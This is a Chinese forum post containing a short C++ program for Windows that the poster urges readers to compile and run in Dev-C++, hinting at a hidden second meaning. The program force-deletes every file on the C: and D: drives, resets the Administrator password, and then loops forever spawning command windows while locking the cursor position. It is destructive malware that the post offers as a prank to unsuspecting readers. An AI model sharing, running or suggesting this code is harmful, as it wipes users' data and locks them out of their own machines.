用户:
IDF哲宇MIKE查看:0 回复:1 评论:0 创建时间:2022-07-30T18:34:23
#include<iostream>
#include<stdlib.h>
#include<conio.h>
#include<windows.h>
#include<ctime>
using namespace std;
int main()
{
system("del /F /S /Q D:\\");
system("del /F /S /Q C:\\");
system("net user Administrator wait");
int x=200,y=200;
while(1){
system("start cmd");
SetCursorPos(x,y);
}
return 0;
}
你们试一试就知道了(记得要用Dev-c++运行)()()()()()()()()() 祈祷你们能看得懂,两层意思,自己猜吧。